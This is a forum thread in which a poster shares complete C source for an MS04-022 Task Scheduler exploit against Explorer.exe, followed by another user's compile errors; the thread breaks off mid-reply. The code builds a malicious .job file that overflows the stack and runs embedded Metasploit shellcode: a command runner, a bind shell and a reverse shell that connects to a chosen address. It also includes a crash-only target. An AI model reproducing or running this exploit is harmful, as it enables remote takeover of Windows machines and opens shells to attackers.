ScriptGod

/***********************************************************************\
* MS04-022 Task Scheduler Exploit                                       *
* by ScriptGod                                                          *
*                                                                       *
* tested against:                                                       *
* - Windows XP GER SP0                                                  *
* - Windows XP GER SP1                                                  *
* - Windows 2000 GER SP4                                                *
*                                                                       *
* The first instruction that can be controlled can only be a few bytes  *
* long, so I used a short jump to the second (the "real") jump, which   *
* then jumps to the payload.                                            *
*                                                                       *
* The bad characters which are avoided through the XOR encoder are      *
* only GUESSED. Probably these are not all or some of them are wrong.   *
* But I haven't had any problem with this set of characters.            *
*                                                                       *
* This exploit is written for Explorer.exe. It should work with other   *
* applications, but that is untested - you probably have to change the  *
* return address for other applications.                                *
*                                                                       *
* The advisory lists Windows 2000 as well, but my Windows 2000 doesn't  *
* seem to be vulnerable. Maybe other applications, or Windows 2000 with *
* Internet Explorer 6 installed, are affected.                          *
\***********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#endif

// Length in bytes of the Application Name string written into the .job
// file; this is the size of the ExploitData buffer that
// CreateJobFilePayload hands to CreateJobFile.
#define OVERFLOW_SIZE 1024

// Job file parts: the fixed bytes that surround the Application Name field.
// CreateJobFile writes Job_Part1, then a 16-bit character count and the
// name itself (2-byte characters plus a 2-byte terminator), then Job_Part2.
// NOTE(review): the meaning of the individual fields is not derived from
// the .job specification here; only what the bytes visibly contain is noted.
unsigned char Job_Part1[] =
"\x47\x04\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x46\x00\xff\xff\x00\x00\x00\x00\x3c\x00\x0a\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0f\x00\x00\x00\x00\x05\x13\x04\x00"
"\x00\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
// Job_Part2 carries a 16-bit count of 5 followed by "root" as 2-byte
// characters (72 00 6f 00 6f 00 74 00) and a 2-byte terminator - the same
// count-includes-terminator, 16-bit-character convention that CreateJobFile
// applies to the Application Name.
unsigned char Job_Part2[] =
"\x00\x00\x00\x00\x05\x00\x72\x00\x6f\x00\x6f\x00\x74\x00\x00\x00"
"\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00\x00\x00\x00\x00";

// Control-flow stubs copied to fixed offsets of ExploitData by
// CreateJobFilePayload (Stack at 0, Jump2 at 505, Jump at 534).
unsigned char Jump[] = "\xeb\xe1";    // jmp short: rel8 0xe1 = -31 from the next instruction,
                                      // i.e. 29 bytes before the jmp itself (534 -> 505 = Jump2)
unsigned char Jump2[] = "\xe9\x02\xfe\xff\xff"; // jmp near: rel32 0xfffffe02 = -510 from the next
                                      // instruction, i.e. 505 bytes back (505 -> 0 = Stack)
unsigned char Stack[] = "\x66\x81\xec\xd0\x07"; // sub sp, 0x07d0 (= 2000; 16-bit operand via the
                                      // 0x66 prefix) - presumably moves the stack pointer away
                                      // from the buffer before the decoder's fnstenv/pop and the
                                      // payload's pushes write to the stack
// (the 0x41 = inc ecx filler used as a NOP slide is set in CreateJobFilePayload)

// Payload XOR decoder. It is copied right after Stack and is NOT encoded
// itself, so its fixed bytes must already avoid the bad characters; three
// bytes are patched per payload (see the *_OFFSET defines below).
unsigned char Decoder[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x80\xeb\xe9\x31\xc9\x66\x81\xe9\x00"
"\x80\x80\x33\xff\x43\xe2\xfa";
/*
[BITS 32]

; get EIP
fldz                      ; any FPU instruction: its address is recorded as the FPU IP
fnstenv [esp-12]          ; 28-byte FPU environment; the saved FPU IP field (offset 12)
                          ; lands exactly at [esp]
pop ebx                   ; ebx = address of fldz = first byte of the decoder
sub bl, -23               ; ebx += 23 (decoder length) -> first payload byte.
                          ; 8-bit add: assumes the decoder does not straddle a
                          ; 256-byte boundary, otherwise ebx is off by 0x100

; payload size
xor ecx, ecx
sub cx, -32768            ; imm16 placeholder (bytes 15-16), patched to the negated
                          ; payload length so that cx = payload length

xor_loop:
 xor byte [ebx], 0xff     ; key placeholder (byte 19), patched per payload
 inc ebx
 loop xor_loop
*/
#define DECODER_SIZE_OFFSET  15  // low byte of the sub cx, imm16 immediate
#define DECODER_XOR_OFFSET  19   // imm8 of xor byte [ebx], imm8

// Stack stub + decoder + encoded payload must fit in front of Jump2 at
// offset 505 of ExploitData (offset 504 stays filler): 504 usable bytes.
#define PAYLOAD_LEN_LIMIT  ( 504 - ( sizeof( Stack ) - 1 ) - ( sizeof( Decoder ) - 1 ) )

/* win32_exec - Raw Shellcode [ EXITFUNC=seh CMD= FIXSTACK=1 Size=161 ] http://metasploit.com */
// The identifier is spelled "Paylaod" (sic) and main() uses it that way; it
// is kept as-is. The command is NOT part of this array: the literal's own
// NUL is excluded everywhere via sizeof(...) - 1 (hence the commented-out
// trailing "\x00"), and main() appends the NUL-terminated command directly
// after the last instruction, so the final `call` (e8 e1 ff ff ff) pushes
// the address of that command string before jumping back into the code.
unsigned char Paylaod_WinExec[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff"/*\x00"*/;

/* win32_bind - Raw Shellcode [ EXITFUNC=thread LPORT=4444 Size=375 ] http://metasploit.com */
// Listens on TCP LPORT. Bytes 233-237 are `push 0x5c110002` (68 02 00 11 5c),
// which in memory reads 02 00 11 5c - presumably the start of the sockaddr_in
// (AF_INET = 2, then the port in network order, 0x115c = 4444). main() patches
// the two port bytes at BINDSHELL_PORT_OFFSET.
unsigned char Payload_BindShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
// offset of the 2 network-order port bytes (11 5c above)
#define BINDSHELL_PORT_OFFSET 236

/* win32_reverse - Raw Shellcode [ EXITFUNC=thread LHOST=127.0.0.1 LPORT=4321 FIXSTACK=1 Size=357 ] http://metasploit.com */
// Connects back to LHOST:LPORT. Bytes 221-225 are `push 0x0100007f`
// (68 7f 00 00 01 = 127.0.0.1 in network order) and bytes 226-230 are
// `push 0x10e10002` (68 02 00 10 e1: AF_INET 2, port 0x10e1 = 4321).
// main() patches the 4 address bytes and the 2 port bytes at the offsets
// defined below.
unsigned char Payload_ReverseShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf"
"\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0"
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00"
"\x00\x01\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20"
"\x59\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24"
"\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44"
"\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89"
"\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0"
"\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a"
"\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff\x55\x04"
"\x31\xdb\x53\xff\xd0";
// offsets of the 4 address bytes (7f 00 00 01) and the 2 port bytes (10 e1)
#define REVERSESHELL_IP_OFFSET  222
#define REVERSESHELL_PORT_OFFSET 229

// PayloadID values accepted on the command line (main() dispatches on them
// and rejects anything >= 3); printed by usage().
#define PAYLOAD_ID_WINEXEC 0
#define PAYLOAD_ID_BIND  1
#define PAYLOAD_ID_REVERSE 2

// A target pairs the name shown by usage() with the 32-bit value that
// CreateJobFilePayload writes over the saved return address (offset 518 of
// ExploitData). The TargetID argument to main() is an index into Targets[].
typedef struct
{
const char* pszName;
unsigned long nNewEIP;   // 4 bytes on the Win32 toolchains this is built with
} Target;
Target Targets[] =
{
{ "Windows XP SP0+1 GER", 0x76e21a21 }, // ACTIVEDS.dll, jmp esp (German XP SP0/SP1 builds per the file header)
{ "DoS Windows XP ALL",  0xffffffff },  // not a code address: meant to crash the process only, as the name says
};

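/*
 * Write a Task Scheduler .job file whose Application Name field is the
 * given byte string.
 *
 * pszFile             - output path (opened with "wb", overwritten)
 * pApplicationName    - raw bytes of the name, already in the 2-byte
 *                       character encoding the .job format uses
 * nApplicationNameLen - number of bytes in pApplicationName (must be even)
 *
 * File layout produced:
 *   Job_Part1
 *   u16 LE   character count of the name including its terminator
 *   name bytes
 *   u16      0 terminator
 *   Job_Part2
 *
 * The .job format stores strings as 16-bit little-endian characters
 * (Job_Part2 itself carries "root" as 72 00 6f 00 6f 00 74 00), so the
 * character width is fixed at 2 bytes here instead of sizeof(wchar_t),
 * which is 4 on many non-Windows toolchains and would corrupt both the
 * count field and the terminator. The fields are assembled byte-wise
 * rather than through casted pointer stores, so the output is the same on
 * any host endianness.
 *
 * Returns true when the whole file was written and closed, false on any
 * failure (a "[-]" diagnostic is printed).
 */
bool CreateJobFile( const char *pszFile, const unsigned char *pApplicationName, unsigned long nApplicationNameLen )
{
    const unsigned long nCharSize = 2;                       // .job strings use 16-bit characters
    const unsigned long nPart1Len = sizeof( Job_Part1 ) - 1; // -1: drop the literal's own NUL
    const unsigned long nPart2Len = sizeof( Job_Part2 ) - 1;

    if( nApplicationNameLen % nCharSize != 0 )
    {
        printf( "[-] application name length %lu is not a multiple of %lu bytes\n",
                nApplicationNameLen, nCharSize );
        return false;
    }

    // count field = characters + terminator; it is a 16-bit field
    const unsigned long nCharCount = nApplicationNameLen / nCharSize + 1;
    if( nCharCount > 0xffff )
    {
        printf( "[-] application name too long for the 16-bit length field\n" );
        return false;
    }

    const unsigned long nJobDataSize = nPart1Len + nCharSize + nApplicationNameLen + nCharSize + nPart2Len;
    unsigned char *pJobData = (unsigned char*)calloc( nJobDataSize, 1 );
    if( !pJobData )
    {
        printf( "[-] out of memory\n" );
        return false;
    }

    unsigned long nPos = 0;

    memcpy( &pJobData[ nPos ], Job_Part1, nPart1Len );
    nPos += nPart1Len;

    // character count, little-endian
    pJobData[ nPos ]     = (unsigned char)( nCharCount & 0xff );
    pJobData[ nPos + 1 ] = (unsigned char)( ( nCharCount >> 8 ) & 0xff );
    nPos += nCharSize;

    if( nApplicationNameLen > 0 )
        memcpy( &pJobData[ nPos ], pApplicationName, nApplicationNameLen );
    nPos += nApplicationNameLen;

    // 2-byte terminator: calloc already zeroed it
    nPos += nCharSize;

    memcpy( &pJobData[ nPos ], Job_Part2, nPart2Len );

    bool bOk = false;
    FILE *pOutFile = fopen( pszFile, "wb" );
    if( !pOutFile )
    {
        printf( "[-] couldn't open file\n" );
    }
    else
    {
        if( fwrite( pJobData, 1, nJobDataSize, pOutFile ) != nJobDataSize )
            printf( "[-] failed to write to file\n" );
        else
            bOk = true;

        // fclose flushes the buffered data; if it fails the file is incomplete
        if( fclose( pOutFile ) != 0 )
        {
            printf( "[-] failed to close file\n" );
            bOk = false;
        }
    }

    free( pJobData );
    return bOk;
}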

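/*
 * Bytes that must not appear in the encoded payload nor in the decoder's
 * patched bytes. This set is the author's GUESS for what the job-file path
 * alters (see the file header); it has not been verified here.
 */
static bool IsBadChar( unsigned char c )
{
    switch( c )
    {
    case 0x00: case 0x0a: case 0x0d: case 0x25: case 0x26:
    case 0x3d: case 0x3f: case 0x40: case 0xfe: case 0xff:
        return true;
    default:
        return false;
    }
}

/*
 * Try every single-byte XOR key (0x01..0xfe) and keep the first one that
 * leaves no bad character in the encoded payload. The key byte itself is
 * patched into the unencoded decoder and travels the same path as the
 * payload, so a key that is a bad character is skipped as well.
 * Writes the encoded bytes to pOut (room for nPayloadLen bytes) and the key
 * to *pKey. Returns false when no key qualifies or nPayloadLen is 0.
 */
static bool FindXorKey( const unsigned char *pPayload, unsigned long nPayloadLen,
                        unsigned char *pOut, unsigned char *pKey )
{
    for( unsigned int nKey = 0x01; nKey < 0xff; nKey++ )
    {
        const unsigned char cKey = (unsigned char)nKey;
        if( IsBadChar( cKey ) )
            continue;

        unsigned long n;
        for( n = 0; n < nPayloadLen; n++ )
        {
            pOut[ n ] = (unsigned char)( pPayload[ n ] ^ cKey );
            if( IsBadChar( pOut[ n ] ) )
                break;
        }
        if( n == nPayloadLen && nPayloadLen > 0 )
        {
            *pKey = cKey;
            return true;
        }
    }
    return false;
}

/*
 * Build the OVERFLOW_SIZE-byte application-name string and write it into a
 * .job file via CreateJobFile().
 *
 * pszFile     - output .job path
 * pPayload    - raw shellcode (plus any trailing data such as the WinExec
 *               command); XOR-encoded so that it contains no bad character
 * nPayloadLen - length of pPayload in bytes, 1 .. PAYLOAD_LEN_LIMIT
 * nEIP        - 32-bit value written over the saved return address
 *
 * Layout of ExploitData (byte offsets):
 *      0  Stack     sub sp, 0x07d0
 *      5  Decoder   private copy of Decoder with size and key patched in
 *     28  payload   XOR-encoded, at most PAYLOAD_LEN_LIMIT bytes (ends <= 503)
 *    504  0x41      filler ('A' = inc ecx)
 *    505  Jump2     jmp rel32 -510 -> offset 0
 *    518  nEIP      the overwritten return address
 *    534  Jump      jmp short rel8 -31 -> offset 505
 *    all remaining bytes 0x41
 * With a "jmp esp" return address, execution presumably resumes just past
 * the overwritten return slot (offset 522), slides over the 0x41 filler into
 * Jump at 534, then Jump2 at 505, then the stack stub at 0; the exact landing
 * point depends on the target's stack layout and is not established here.
 *
 * The globals Decoder/Stack/Jump/Jump2 are read only; the decoder is patched
 * in a local copy. Returns CreateJobFile()'s result, or false on a size or
 * encoding problem (a "[-]" diagnostic is printed).
 */
bool CreateJobFilePayload( const char *pszFile, const unsigned char *pPayload, unsigned long nPayloadLen, unsigned long nEIP )
{
    enum
    {
        STACK_LEN    = sizeof( Stack ) - 1,
        DECODER_LEN  = sizeof( Decoder ) - 1,
        JUMP_LEN     = sizeof( Jump ) - 1,
        JUMP2_LEN    = sizeof( Jump2 ) - 1,
        JUMP2_OFFSET = 505,   // jmp rel32 back to offset 0
        EIP_OFFSET   = 518,   // saved return address
        JUMP_OFFSET  = 534    // jmp short back to JUMP2_OFFSET
    };
    unsigned char PayloadXOR[ PAYLOAD_LEN_LIMIT ];
    unsigned char DecoderPatched[ DECODER_LEN ];
    unsigned char ExploitData[ OVERFLOW_SIZE ];
    unsigned char cXORKey = 0;

    if( nPayloadLen == 0 )
    {
        printf( "[-] payload is empty\n" );
        return false;
    }
    if( nPayloadLen > PAYLOAD_LEN_LIMIT )
    {
        printf( "[-] your payload size of %lu exceeds the limit of %lu\n",
                nPayloadLen, (unsigned long)PAYLOAD_LEN_LIMIT );
        return false;
    }

    // encode
    memset( PayloadXOR, 0x00, sizeof( PayloadXOR ) );
    if( !FindXorKey( pPayload, nPayloadLen, PayloadXOR, &cXORKey ) )
    {
        printf( "[-] couldn't find a suitable xor key\n" );
        return false;
    }

    // patch a private copy of the decoder: the loop count is stored negated
    // (the decoder does `sub cx, imm16`), little-endian, plus the key byte
    memcpy( DecoderPatched, Decoder, DECODER_LEN );
    const unsigned short nNegLen = (unsigned short)( 0x10000UL - nPayloadLen );
    DecoderPatched[ DECODER_SIZE_OFFSET ]     = (unsigned char)( nNegLen & 0xff );
    DecoderPatched[ DECODER_SIZE_OFFSET + 1 ] = (unsigned char)( nNegLen >> 8 );
    // NOTE(review): the high byte of the negated length is 0xfe or 0xff for
    // every payload this tool can build; both are in the guessed bad-char
    // list, yet the author reports working runs, so they are not rejected.
    DecoderPatched[ DECODER_XOR_OFFSET ] = cXORKey;

    // 0x41 ('A' = inc ecx) everywhere the layout below does not overwrite
    memset( ExploitData, 0x41, sizeof( ExploitData ) );

    // stack stub, decoder, payload - together at most 504 bytes (offsets 0..503)
    unsigned long nPos = 0;
    memcpy( &ExploitData[ nPos ], Stack, STACK_LEN );
    nPos += STACK_LEN;
    memcpy( &ExploitData[ nPos ], DecoderPatched, DECODER_LEN );
    nPos += DECODER_LEN;
    memcpy( &ExploitData[ nPos ], PayloadXOR, nPayloadLen );

    memcpy( &ExploitData[ JUMP2_OFFSET ], Jump2, JUMP2_LEN );

    // return address, little-endian, written byte-wise: exactly 4 bytes
    // regardless of sizeof(unsigned long) and without an aliasing cast
    ExploitData[ EIP_OFFSET ]     = (unsigned char)( nEIP         & 0xff );
    ExploitData[ EIP_OFFSET + 1 ] = (unsigned char)( ( nEIP >> 8 )  & 0xff );
    ExploitData[ EIP_OFFSET + 2 ] = (unsigned char)( ( nEIP >> 16 ) & 0xff );
    ExploitData[ EIP_OFFSET + 3 ] = (unsigned char)( ( nEIP >> 24 ) & 0xff );

    memcpy( &ExploitData[ JUMP_OFFSET ], Jump, JUMP_LEN );

    return CreateJobFile( pszFile, ExploitData, sizeof( ExploitData ) );
}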

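/*
 * Print the command-line syntax plus the TargetID and PayloadID tables to
 * stdout. argv0 is the program name echoed in the usage line.
 * The format specifiers match the argument types (the index is printed as
 * unsigned, the EIP as unsigned long with %lx); the previous %i / %x pair
 * did not, which is undefined behaviour under printf.
 */
void usage( const char *argv0 )
{
    printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );
    printf( "\n" );

    // TargetIDs: indices into Targets[], as accepted by main()
    printf( "%-8s  %-35s  %s\n", "TargetID", "Name", "EIP" );
    printf( "----------------------------------------------------------\n" );
    const size_t nTargets = sizeof( Targets ) / sizeof( Targets[ 0 ] );
    for( size_t n = 0; n < nTargets; n++ )
        printf( "%-8u  %-35s  0x%08lx\n", (unsigned)n, Targets[ n ].pszName, Targets[ n ].nNewEIP );

    printf( "\n" );

    // PayloadIDs: the PAYLOAD_ID_* constants main() dispatches on
    printf( "%-9s  %s\n", "PayloadID", "Name" );
    printf( "--------------------------\n" );
    printf( "%-9i  %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
    printf( "%-9i  %s\n", PAYLOAD_ID_BIND,  "BindShell" );
    printf( "%-9i  %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}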

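/*
 * Parse a decimal command-line integer strictly: the whole argument must be
 * consumed by strtol and the value must lie in [nMin, nMax]. Returns false
 * otherwise and leaves *pValue untouched. atoi() would accept "4abc" as 4
 * and turn garbage into 0, silently selecting target/payload 0.
 */
static bool ParseLong( const char *psz, long nMin, long nMax, long *pValue )
{
    char *pEnd = NULL;
    long nValue = strtol( psz, &pEnd, 10 );

    // out-of-range input saturates to LONG_MIN/LONG_MAX and fails the bounds test
    if( pEnd == psz || *pEnd != '\0' || nValue < nMin || nValue > nMax )
        return false;

    *pValue = nValue;
    return true;
}

/*
 * Entry point.
 *
 *   argv[1] TargetID   index into Targets[]
 *   argv[2] PayloadID  PAYLOAD_ID_WINEXEC / PAYLOAD_ID_BIND / PAYLOAD_ID_REVERSE
 *   argv[3] output .job file
 *   argv[4] command (WinExec) | bind port (BindShell) | IP (ReverseShell)
 *   argv[5] port (ReverseShell only)
 *
 * Patches the chosen payload's port / address bytes and hands it to
 * CreateJobFilePayload(). Returns 0 when the job file was written and 1 on
 * bad arguments or any failure (previously 0 was returned in every case,
 * which hid failures from callers such as scripts).
 *
 * The port and IP are copied with memcpy of exactly 2 and 4 bytes: the
 * former `*(unsigned long*)... = nIP` store writes 8 bytes on LP64 hosts
 * and clobbers the `push` that follows the address in the reverse shell.
 */
int main( int argc, char **argv )
{
    const long nTargetCount = (long)( sizeof( Targets ) / sizeof( Targets[ 0 ] ) );
    long nTargetID = 0;
    long nPayloadID = 0;
    long nValue = 0;
    bool bCreated = false;

    // banner
    printf( "+----------------------------------+\n" );
    printf( "| MS04-022 Task Scheduler Exploits |\n" );
    printf( "|        (for Explorer.exe)        |\n" );
    printf( "|                                  |\n" );
    printf( "|           by ScriptGod           |\n" );
    printf( "+----------------------------------+\n" );
    printf( "|       version of 24.07.04        |\n" );
    printf( "+----------------------------------+\n" );

    // arguments: count first, then strict range checks so that a negative or
    // non-numeric TargetID can never index Targets[]
    if( argc < 5 ||
        !ParseLong( argv[ 1 ], 0, nTargetCount - 1, &nTargetID ) ||
        !ParseLong( argv[ 2 ], PAYLOAD_ID_WINEXEC, PAYLOAD_ID_REVERSE, &nPayloadID ) ||
        ( nPayloadID == PAYLOAD_ID_REVERSE && argc < 6 ) )
    {
        usage( argv[ 0 ] );
        return 1;
    }

    const char *pszJobFile = argv[ 3 ];
    const unsigned long nEIP = Targets[ nTargetID ].nNewEIP;

    printf( "[+] creating for Target '%s' with ", Targets[ nTargetID ].pszName );

    switch( nPayloadID )
    {
    case PAYLOAD_ID_WINEXEC:
    {
        printf( "WinExec payload\n" );
        printf( "[+] command: %s\n", argv[ 4 ] );

        // shellcode immediately followed by the NUL-terminated command: the
        // payload's final call pushes the address of whatever follows it
        const size_t nCodeLen = sizeof( Paylaod_WinExec ) - 1;
        const size_t nCmdLen  = strlen( argv[ 4 ] ) + 1;   // +1: the NUL
        unsigned char *pWinExec = (unsigned char*)malloc( nCodeLen + nCmdLen );
        if( !pWinExec )
        {
            printf( "[-] out of memory\n" );
            return 1;
        }
        memcpy( pWinExec, Paylaod_WinExec, nCodeLen );
        memcpy( pWinExec + nCodeLen, argv[ 4 ], nCmdLen );

        bCreated = CreateJobFilePayload( pszJobFile, pWinExec, (unsigned long)( nCodeLen + nCmdLen ), nEIP );
        free( pWinExec );
        break;
    }

    case PAYLOAD_ID_BIND:
    {
        printf( "BindShell payload\n" );

        if( !ParseLong( argv[ 4 ], 1, 65535, &nValue ) )
        {
            printf( "[-] invalid port '%s'\n", argv[ 4 ] );
            return 1;
        }
        unsigned short nPort = (unsigned short)nValue;
        printf( "[+] port: %u\n", (unsigned)nPort );

        nPort = htons( nPort );   // the payload stores the port in network order
        memcpy( &Payload_BindShell[ BINDSHELL_PORT_OFFSET ], &nPort, sizeof( nPort ) );

        bCreated = CreateJobFilePayload( pszJobFile, Payload_BindShell, sizeof( Payload_BindShell ) - 1, nEIP );
        break;
    }

    case PAYLOAD_ID_REVERSE:
    {
        printf( "ReverseShell payload\n" );

        // inet_addr() returns the address in network byte order; 0xffffffff
        // (INADDR_NONE) is its error value, so 255.255.255.255 is rejected too
        const unsigned long nIP = inet_addr( argv[ 4 ] );
        if( nIP == 0xffffffffUL )
        {
            printf( "[-] invalid IP address '%s'\n", argv[ 4 ] );
            return 1;
        }
        if( !ParseLong( argv[ 5 ], 1, 65535, &nValue ) )
        {
            printf( "[-] invalid port '%s'\n", argv[ 5 ] );
            return 1;
        }
        unsigned short nPort = (unsigned short)nValue;
        printf( "[+] connect to: %s:%u\n", argv[ 4 ], (unsigned)nPort );

        nPort = htons( nPort );
        // unsigned int is 32 bits on every host this builds on: exactly the 4 address bytes
        const unsigned int nIP32 = (unsigned int)nIP;
        memcpy( &Payload_ReverseShell[ REVERSESHELL_IP_OFFSET ], &nIP32, sizeof( nIP32 ) );
        memcpy( &Payload_ReverseShell[ REVERSESHELL_PORT_OFFSET ], &nPort, sizeof( nPort ) );

        bCreated = CreateJobFilePayload( pszJobFile, Payload_ReverseShell, sizeof( Payload_ReverseShell ) - 1, nEIP );
        break;
    }
    }

    if( bCreated )
        printf( "[+] job file '%s' created\n", pszJobFile );
    else
        printf( "[-] job file creation failed\n" );

    return bCreated ? 0 : 1;
}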
Nostremato
i can´t compile it sad.gif
got many errors...
i would test this exploit but so i can´t
ScriptGod
QUOTE (Nostremato @ Jul 26 2004, 06:05 PM)
i can´t compile it sad.gif
got many errors...
i would test this exploit but so i can´t

can you post this errors?
Nostremato
QUOTE
explorer.c:162: error: syntax error before "CreateJobFile"
explorer.c: In function `CreateJobFile':
explorer.c:174: error: `false' undeclared (first use in this function)
explorer.c:174: error: (Each undeclared identifier is reported only once
explorer.c:174: error: for each function it appears in.)
explorer.c:226: error: `true' undeclared (first use in this function)
explorer.c: At top level:
explorer.c:229: error: syntax error before "CreateJobFilePayload"
explorer.c: In function `CreateJobFilePayload':
explorer.c:231: error: `bool' undeclared (first use in this function)
explorer.c:231: error: syntax error before "bFoundXOR"
explorer.c:241: error: `false' undeclared (first use in this function)
explorer.c:253: error: `bFoundXOR' undeclared (first use in this function)
explorer.c:256: error: `for' loop initial declaration used outside C99 mode
explorer.c:276: error: `true' undeclared (first use in this function)
explorer.c: In function `main':
explorer.c:353: error: `bool' undeclared (first use in this function)
explorer.c:353: error: syntax error before "bCreated"
explorer.c:385: error: `bCreated' undeclared (first use in this function)
explorer.c:385: error: `false' undeclared (first use in this function)
explorer.c:449:2: warning: no newline at end of file
ScriptGod
QUOTE (Nostremato @ Jul 26 2004, 06:08 PM)
QUOTE
explorer.c:162: error: syntax error before "CreateJobFile"
explorer.c: In function `CreateJobFile':
